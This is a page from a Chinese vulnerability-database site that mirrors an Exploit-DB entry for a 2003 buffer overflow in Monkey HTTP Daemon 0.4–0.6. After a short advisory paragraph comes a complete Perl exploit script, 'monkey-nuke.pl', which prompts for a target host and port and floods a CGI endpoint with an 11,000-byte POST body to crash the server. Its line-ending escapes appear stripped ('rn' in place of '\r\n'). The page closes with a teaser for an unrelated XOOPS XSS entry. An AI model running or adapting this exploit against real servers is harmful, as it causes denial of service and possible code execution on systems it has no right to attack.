Monkey HTTP Daemon 0.4/0.5/0.6 – Excessive POST Data Buffer Overflow

Monkey HTTP Daemon 0.4/0.5/0.6 – Excessive POST Data Buffer Overflow

漏洞ID 1053782 漏洞类型
发布时间 2003-03-24 更新时间 2003-03-24
图片[1]-Monkey HTTP Daemon 0.4/0.5/0.6 – Excessive POST Data Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-Monkey HTTP Daemon 0.4/0.5/0.6 – Excessive POST Data Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22433
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7202/info


Monkey HTTP Daemon is prone to a boundary condition error. This condition occurs when the server attempts to handle excessive HTTP POST data. Exploitation could allow a remote attacker to corrupt sensitive regions of memory with attacker-supplied values, resulting in code execution. Exploitation attempts may also result in a denial of service. 

#!/usr/bin/perl
# monkey-nuke.pl
# Monkey HTTPd Remote Buffer Overflow
# Discovery/Exploit by Matthew Murphy
use IO::Socket;
print STDOUT "What host to connect to []: ";
$host = trim(chomp($line = <STDIN>));
print STDOUT "What port to connect to [80]: ";
$port = trim(chomp($line = <STDIN>));
$addr = "$host:$port";
print STDOUT "What script to submit to [/cgi-bin/test.pl]: ";
$script = trim(chomp($line = <STDIN>));
$buffer = "A"x11000;
$exploit = "POST /$script HTTP/1.0rn";
$exploit.= "Content-Type: application/x-www-form-urlencodedrn";
$exploit.= "Content-Length: 11000rnrn";
$exploit.= "$bufferrnrn";
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$addr);
print $f $exploit;
sleep 5;
undef $f;

相关推荐: XOOPS Quizz模块跨站脚本(XSS)漏洞

XOOPS Quizz模块跨站脚本(XSS)漏洞 漏洞ID 1203343 漏洞类型 跨站脚本 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2386 CNNVD-ID CNNVD-200212-466 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享